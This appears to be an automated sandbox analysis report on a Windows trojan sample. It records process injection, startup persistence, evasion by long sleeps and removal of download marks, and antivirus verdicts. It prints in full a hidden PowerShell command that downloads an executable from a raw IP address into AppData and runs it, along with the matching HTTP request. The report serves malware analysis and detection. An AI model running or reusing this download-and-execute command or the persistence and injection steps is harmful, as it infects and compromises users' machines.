__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43204092 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43113232 registers.esi: 39330764 registers.ecx: 1905478958	1
__exception__ Aug. 31, 2021, 11:11 a.m.	stacktrace: 0x5e0ea0 0x5e0bf2 0x5e043b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x728f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7290264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x729b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7435f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fb7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fb4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: 8b 42 04 3b 45 dc 0f 95 c0 0f b6 c0 85 c0 75 1b exception.instruction: mov eax, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5e13ac registers.esp: 5042732 registers.edi: 43211308 registers.eax: 0 registers.ebp: 5042804 registers.edx: 0 registers.ebx: 43113340 registers.esi: 39330764 registers.ecx: 1905478958	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.169.255.212/pnb/vbc.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://www.google.com/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://www.bing.com/

Performs some HTTP requests (3 events)

request	GET http://193.169.255.212/pnb/vbc.exe
request	GET https://www.google.com/
request	GET https://www.bing.com/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 519 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000008a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1a5b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002150000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002300000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 1660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef13c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef163f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 31, 2021, 10:50 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1640000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys4h57g.lnk
file	C:\Users\test22\AppData\Roaming\vbc.exe

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys4h57g.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', 'C:\Users\test22\AppData\Roaming\\vbc.exe')
cmdline	"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', '%AppData%\\vbc.exe') & powershell Start-Process -FilePath '%AppData%\\vbc.exe' & exit
cmdline	powershell Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\\vbc.exe'
cmdline	cmd /c powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', '%AppData%\\vbc.exe') & powershell Start-Process -FilePath '%AppData%\\vbc.exe' & exit

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\vbc.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\vbc.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 31, 2021, 10:50 a.m.	show_type: 0 filepath_r: cmd parameters: /c powershell (New-Object System.Net.WebClient).DownloadFile('http://193.169.255.212/pnb/vbc.exe', '%AppData%\\vbc.exe') & powershell Start-Process -FilePath '%AppData%\\vbc.exe' & exit filepath: cmd	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 31, 2021, 10:50 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

®Ä"i.;2As6D+]nÏè4$%IÍV#Ah"Þì2ª¸j% 3 )$ ;_ ~ # Tw [0å(Atþþ-è(At&(Atþþ-ßÞ>(AtþþÞ$+þþþ þþþ-áÞÞ(Atþ(At&(At&þþþþþþ-N(At&(At&þþþþ(At&Þ&(AtþþþÞÞ(At&Þ(At-`þ-(At&þ(At&+2(At&þþ(At&(Atþþþ-¢+Bþ-(Atþ þ þ Þ &(At-þ þ þ þ Þþ þþ(At(At(At\Ù×- (At&+9þ þþ-þþ(At-ê+(Atþþ(At&Þ(AtþþþÞþ-Ð-Ëþ-((At&(At &þþþþ+(At&(At-(Atþ++(At&(At-ç-àÞF&(At&(At&(At&Þ&þ þ þ (At-åÞÞþ:(Atþþþ(At-ÜÞ^&þ þþ-3þþþþ(At&(Atþ þþ+(AtþþþÞ+;þ-(Atþþþ+þþÞ&(At&Þ(At&(At&þ þþþþþ þ þ-,þ þ Þ&(At&ÞÞ(At&Þþ þþþþ þþ×Ù-þþÞ(At&ÞÞ&(Atþ(At&Þþ þ þþþþ(At &(At-+(At&þ-í

Poweshell is sending data to a remote host (1 event)

Data sent

GET /pnb/vbc.exe HTTP/1.1 Host: 193.169.255.212 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 31, 2021, 10:50 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 31, 2021, 11:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 31, 2021, 11:11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 31, 2021, 11:11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Communicates with host for which no DNS query was performed (2 events)

host	13.107.21.200
host	193.169.255.212

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 31, 2021, 11:12 a.m.	process_identifier: 3056 region_size: 229376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000628	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 31, 2021, 11:11 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	vbc.exe tried to sleep 8184511 seconds, actually delayed analysis time by 8184511 seconds
description	sys4h57g.exe tried to sleep 8184514 seconds, actually delayed analysis time by 8184514 seconds

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys4h57g.lnk

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2376 manipulating memory of non-child process 3056
NtAllocateVirtualMemory Aug. 31, 2021, 11:12 a.m.	process_identifier: 3056 region_size: 229376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000628	1	0	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2376 injected into non-child 3056
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡'éTàÈ`ç @ 8çW ] H.textÇ È `.relocÊ@B.rsrc ] ^Ì@@ base_address: 0x00400000 process_identifier: 3056 process_handle: 0x00000628	1	1	0
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: à7 base_address: 0x00420000 process_identifier: 3056 process_handle: 0x00000628	1	1	0
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3056 process_handle: 0x00000628	1	1	0

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2376 injected into non-child 3056
WriteProcessMemory Aug. 31, 2021, 11:12 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡'éTàÈ`ç @ 8çW ] H.textÇ È `.relocÊ@B.rsrc ] ^Ì@@ base_address: 0x00400000 process_identifier: 3056 process_handle: 0x00000628	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Aug. 31, 2021, 10:50 a.m.	buffer: GET /pnb/vbc.exe HTTP/1.1 Host: 193.169.255.212 Connection: Keep-Alive socket: 1260 sent: 76	1	76	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\vbc.exe"
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\vbc.exe

Attempts to remove evidence of file being downloaded from the Internet (2 events)

file	C:\Users\test22\AppData\Local\sys30\sys4h57g.exe\:Zone.Identifier
file	C:\Users\test22\AppData\Roaming\vbc.exe\:Zone.Identifier

Creates a suspicious Powershell process (3 events)

value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.MSIL.Nitol.4!c
FireEye	Generic.mg.aa17e1f1f3f2b6b4
McAfee	Artemis!AA17E1F1F3F2
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	Trojan:MSIL/Nitol.0fbcf4c4
BitDefenderTheta	Gen:NN.ZemsilF.34110.am0@a8Su0!k
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Kryptik.ACOO
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.MSIL.Nitol.gen
Avast	FileRepMalware
Tencent	Msil.Trojan.Nitol.Llqt
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_94%
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Win32/Woreflint.A!cl
GData	Win32.Trojan-Downloader.Generic.JCY51M
Cynet	Malicious (score: 100)
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Kryptik.ACOO!tr
Webroot	W32.Trojan.Gen
AVG	FileRepMalware
CrowdStrike	win/malicious_confidence_80% (W)

Executed a process and injected code into it, probably while unpacking (43 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 1660	1	0
NtResumeThread Aug. 31, 2021, 10:50 a.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 1660	1	0
